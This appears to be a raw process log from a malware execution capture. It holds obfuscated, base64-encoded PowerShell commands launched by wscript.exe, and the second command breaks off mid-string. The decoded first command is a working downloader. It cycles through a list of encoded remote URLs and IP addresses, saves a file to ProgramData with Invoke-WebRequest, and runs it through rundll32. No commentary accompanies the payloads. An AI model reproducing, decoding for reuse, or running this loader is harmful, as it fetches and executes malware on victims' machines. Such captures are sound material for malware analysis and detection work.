sAbQBhAGsAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBJAEEAYgB3AEIAeQBBAEcAYwBBAGEAQQBCAHAAQQBGAEkAQQBaAFEAQgBqAEEARwA4AEEAYgBnAEIAbQBBAEcAawBBAGMAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGoAQQBHADgAQQBiAGcAQgB6AEEASABVAEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEARwBVAEEAZABBAEIAeQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBGAEEASABnAEEAZABBAEIAeQBBAEgAVQBBAGMAdwBCAHAAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWgBRAEIAdQBBAEgAUQBBAFoAUQBCAHkAQQBIAEEAQQBjAGcAQgBwAEEASABNAEEAWgBRAEIAegBBAEEAPQA9AHIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAYgB3AEIAdABBAEcAOABBAFoAUQBCAHkAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAeQBBAEcAVQBBAGQAZwBCAHAAQQBHAFUAQQBkAHcAQQA9ACIAOwAkAGEAcABvAHMAdAByAG8AcABoAGkAegBlAGQAQwBvAG0AcABsAGUAeABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgASQBBAGIAdwBCAHcAQQBIAEkAQQBhAFEAQgBsAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFoAUQBCAHoAQQBGAE0AQQBjAFEAQgAxAEEARwBFAEEAYgBRAEIAbABBAEcAdwBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQQB1AEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAEIATgBVAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeABBAEQARQBBAE4AZwBBAD0AIgA7ACQAcABlAHIAagB1AHIAZQBkAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAEEAQQAiADsAJABUAG8AbwBtAGwAeQBNAGUAYwBoAGEAbgBvAHIAZQBjAGUAcAB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGIAdwBCAHQAQQBHAGsAQQBkAEEAQgBoAEEARwBRAEEAYQBnAEIAcABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAMABBAEgAVQBBAGMAZwBCAGgAQQBHAHcAQQBMAGcAQgBoAEEARwBNAEEAWQBRAEIAawBBAEcAVQBBAGIAUQBCADUAQQBBAD0APQB2AG0AYwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBPAEEAQQB1AEEARABVAEEATgBRAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBRAEIAWABBAEcAOABBAGMAZwBCAGsAQQBHAEkAQQBkAFEAQgBwAEEARwB3AEEAWgBBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgBvAEEASABJAEEAIgA7ACQAdAByAGkAYwBrAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEAMwBBAEQASQBBAEwAdwBCAHoAQQBEAEUAQQBlAEEAQgB1AEEAQwA4AEEAWgBnAEEAegBBAEUAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATgBBAEEANABBAEMAOABBAGIAZwBCAEkAQQBDADgAQQBSAFEAQgBRAEEAQQA9AD0AdQBKAGkAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAHAAQQBGAG8AQQBkAHcAQgBVAEEARQBZAEEAYwBBAEIAVwBBAEgAQQBBAFIAdwBBAHkAQQBEAEEAQQBWAEEAQQA9AHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgAawBBAGEAQQBCAHgAQQBGAGMAQQBOAHcAQgBqAEEARQBZAEEAUQBRAEIASABBAEQAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANABBAEMAOABBAE8AUQBCAEQAQQBHADAAQQBPAFEAQgBGAEEARgBjAEEATAB3AEIARgBBAEcAdwBBAFEAdwBCAHMAQQBHAHcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQAgAGkAbgAgACQAdAByAGkAYwBrAGwAZQBkACAALQBzAHAAbABpAHQAIAAiAHUASgBpAGEAIgApACAAewAkAGMAbwBwAGgAbwB1AHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBrAEEARQA0AEEAYgB3AEIAdQBBAEcAVQBBAGUAQQBCADAAQQBHAFUAQQBjAGcAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQBEAHEAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAFEAQgBrAEEARwB3AEEAYQBRAEIAbgBBAEcAZwBBAGQAQQBCAEMAQQBIAFUAQQBiAEEAQgBzAEEARwBnAEEAWgBRAEIAaABBAEcAUQBBAFoAUQBCAGsAQQBHAHcAQQBlAFEAQQB1AEEASABJAEEAWgBRAEIAawBBAEEAPQA9AEQAcQBYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBZAFEAQgAwAEEARwA4AEEAYwBBAEIAbwBBAEcAOABBAGMAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAG4AbwBuAGMAbwBuAHYAZQByAHQAaQBiAGwAZQBuAGUAcwBzAEYAaQBkAGkAYwBpAG4AYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwA4AEEAYQBRAEIAcwBBAEcAVQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEARgBBAEEAYwBnAEIAbABBAEcATQBBAFkAUQBCAHUAQQBHAE0AQQBaAFEAQgB5AEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAPQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AQQBBADEAQQBDADQAQQBOAHcAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE8AQQBBAHcAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAGcAQQAxAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBADIAQQBEAE0AQQAiADsAJAB1AG4AbQBlAGEAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAGgAQQBHADQAQQBhAFEAQgBqAEEARQBnAEEAYgB3AEIAdgBBAEgASQBBAFkAUQBCAG8AQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcABBAEgASQBBAFoAUQBCAGoAQQBIAFEAQQBiAHcAQgB5AEEASABrAEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBIAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAcABBAEcAOABBAGMAdwBCAEIAQQBHAGMAQQBZAFEAQgB5AEEARwBrAEEAWQB3AEEAdQBBAEcAcwBBAGEAUQBCADAAQQBHAE0AQQBhAEEAQgBsAEEARwA0AEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBZAHcAQgBqAEEARwB3AEEAWgBRAEIAegBBAEcAawBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQBnAHcAaQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGEAUQBCAHMAQQBHAEUAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAbABBAEcANABBACIAOwB0AHIAeQAgAHsAJABTAHQAZQBtAHMAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAZQBRAEIAbABBAEcAdwBBAGEAUQBCAHUAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFYAQQBHADQAQQBZAFEAQgBuAEEASABJAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBZAGcAQgBsAEEASABRAEEAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAeQBBAEMANABBAE0AUQBBAHcAQQBEAGsAQQBMAGcAQQB4AEEARABJAEEATgB3AEEAPQBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEgASQBBAGQAUQBCAGsAQQBHAGMAQQBhAFEAQgB1AEEARwBjAEEAVgBRAEIAdQBBAEcAVQBBAGIAZwBCADEAQQBHADAAQQBaAFEAQgB5AEEARwBFAEEAZABBAEIAcABBAEgAWQBBAFoAUQBBAHUAQQBHAG8AQQBjAEEAQQA9AHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBZAEEAYQBRAEIAaABBAEcAUQBBAGQAUQBCAGoAQQBIAFEAQQBjAHcAQQB1AEEASABRAEEAYgB3AEIAMQBBAEgASQBBAGMAdwBBAD0AIgA7ACQAVAB1AHIAdABvAHMAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCADAAQQBHAGcAQQBaAFEAQgB2AEEASABJAEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGoAQQBHADgAQQBTAGgARgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYgBBAEIAbABBAEUATQBBAGIAdwBCAGgAQQBHAFEAQQBhAGcAQgAxAEEASABRAEEAWQBRAEIAdQBBAEgAUQBBAEwAZwBCAGkAQQBHAEUAQQBjAGcAQgBuAEEARwBFAEEAYQBRAEIAdQBBAEgATQBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgB3AEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAYwBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYQBRAEIAeQBBAEcANABBAFkAUQBCAHMAQQBGAGMAQQBhAFEAQgB5AEEARwBVAEEAYQBBAEIAaABBAEcAawBBAGMAZwBBAHUAQQBIAFUAQQBhAHcAQQA9ACIAOwAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAHAAaQB0AHQAbABlAHMAdABhAGYAZgBIAHkAcABlAHIAcwB1AGIAdABsAGUALgBoAGUAeABhAG0AZQByAG8AdQBzAEkAZABpAG8AdABpAHMAZQA7ACQASABlAG4AbQBvAGwAZAB5AE0AdQBnAGcAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAdwBCADUAQQBHAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEgAUQBBAGMAZwBCADUAQQBFAFUAQQBZAGcAQgBqAEEARwBFAEEAYwB3AEIAagBBAEMANABBAGQAZwBCAGoAQQBBAD0APQA9AEsASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAGsAQQBMAGcAQQAyAEEARABNAEEATABnAEEANQBBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAEEAQQA9ACIAOwAkAGgAbwBvAGQAdwBpAG4AawBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBRAEEAPQBFAHoAVwB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBADUAQQBEAEkAQQAiADsAJABCAGEAegBhAGEAcgBOAG8AbgBlAHgAYQBnAGcAZQByAGEAdABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcANABBAGIAdwBCAHUAQQBIAEkAQQBZAFEAQgBrAEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBHADAAQQBaAFEAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQA0AEEARABFAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAGkAdAB0AGwAZQBzAHQAYQBmAGYASAB5AHAAZQByAHMAdQBiAHQAbABlAC4AaABlAHgAYQBtAGUAcgBvAHUAcwBJAGQAaQBvAHQAaQBzAGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADYAMgA3ADAAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEgATQBBAGMAQQBCAHAAQQBIAFEAQQBkAEEAQgBzAEEARwBVAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBFAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAegBBAEgAVQBBAFkAZwBCADAAQQBHAHcAQQBaAFEAQQB1AEEARwBnAEEAWgBRAEIANABBAEcARQBBAGIAUQBCAGwAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEAUwBRAEIAawBBAEcAawBBAGIAdwBCADAAQQBHAGsAQQBjAHcAQgBsAEEAQwB3AEEAZABnAEIAcABBAEgAQQBBAGMAdwBBADcAQQBFADAAQQBTAFEAQgBVAEEARQB3AEEAYQBRAEIAagBBAEcAVQBBAGIAZwBCAHoAQQBHAFUAQQAiADsAJABDAG8AbQBiAGUAcgBzAFcAYQByAGQAZQBuAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcARQBBAGQAQQBCAGwAQQBIAGMAQQBZAFEAQgA1AEEARwAwAEEAWQBRAEIAdQBBAEUAUQBBAFoAUQBCAGgAQQBHAFkAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEgAUQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBzAEEAWgBRAEIAMABBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBSAFEAQgB0AEEARwA4AEEAWgBBAEIAcABBAEcANABBAGMAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBnAEEAIgA7ACQAYwBhAHIAYQBiAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAawBBAGIAUQBCAGgAQQBHADQAQQBkAEEAQgB2AEEASABBAEEAZABRAEIAegBBAEYAUQBBAGIAdwBCAHkAQQBIAEkAQQBaAFEAQgBtAEEASABrAEEATABnAEIAdABBAEcAOABBAFoAQQBCAGgAQQBBAD0APQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFcAQQBHAGsAQQBjAHcAQgBqAEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCADAAQQBHADgAQQBjAGcAQQB1AEEARwA0AEEAWQBRAEIAMgBBAEgAawBBAHgAaABLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAFEAQQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAdwBBAEgASQBBAGIAdwBCAHcAQQBHAGcAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEcAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBACIAOwAkAFMAeQBuAGEAbgBnAGkAYQBsAEMAbwByAGIAZQBsAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQB1AEEARABnAEEATQBnAEEAdQBBAEQASQBBAE0AZwBBADEAQQBBAD0APQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFkAQQBaAFEAQgB5AEEARwBJAEEAWQBRAEIAcwBBAEcAawBBAGMAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAUwBBAEIAbABBAEgASQBBAFoAQQBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAawBBAGQAQQBCAGwAQQBHAFEAQQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBsAEEARwA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgBrAEEAQwA0AEEAYQB3AEIAcABBAEgAUQBBAFkAdwBCAG8AQQBHAFUAQQBiAGcAQQA9AEsARABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBADAAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAEwAdQBuAGMAaABlAG8AbgBlAHQAdABlAHMATQBlAG4AdABoAGEAYwBlAGEAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAUQBBAGMAZwBCADEAQQBHAFEAQQBaAHcAQgBwAEEARwA0AEEAWgB3AEIAVgBBAEcANABBAFoAUQBCAHUAQQBIAFUAQQBiAFEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBDADQAQQBjAGcAQgB2AEEARwBNAEEAYQB3AEIAegBBAEEAPQA9ACIAOwAkAGgAZQBuAGMAaABtAGUAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AEYAVwBNAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB4AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE8AUQBBAD0ARgBXAE0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAE0AQQBkAHcAQgBoAEEARwBrAEEAYgBBAEIAVABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA="
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABwAGEAbABtAGUAbABsAG8AaQBkAFMAZQBuAHMAYQB0AGkAbwBuAGkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAawBBAGIAZwBCAGwAQQBIAGcAQQBiAHcAQgB5AEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBKAEEASABNAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQBKAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAaQBBAEgASQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQgBUAEEARwA0AEEAYgB3AEIAaQBBAEcASQBBAGEAUQBCAHoAQQBHAGcAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcATQBBAFkAUQBCAHQAQQBHAFUAQQBjAGcAQgBoAEEAQQA9AD0ASgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAFUAQQAiADsAJABsAGkAcQB1AGUAZgBpAGUAcwBVAG4AdwBhAGQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgB3AEEAegBBAEMANABBAE0AUQBBAHgAQQBEAGcAQQBMAGcAQQA0AEEARABRAEEAVgBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBBAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBOAHcAQQA0AEEAQwA0AEEATgB3AEEANQBBAEEAPQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAFoAUQBCADAAQQBIAFEAQQBhAFEAQgB0AEEARwBFAEEATABnAEIAagBBAEcARQBBAGMAdwBCAHAAQQBHADQAQQBiAHcAQQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAFEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AUQBBADEAQQBEAGsAQQAiADsAJABzAHQAbwBjAGsAbQBhA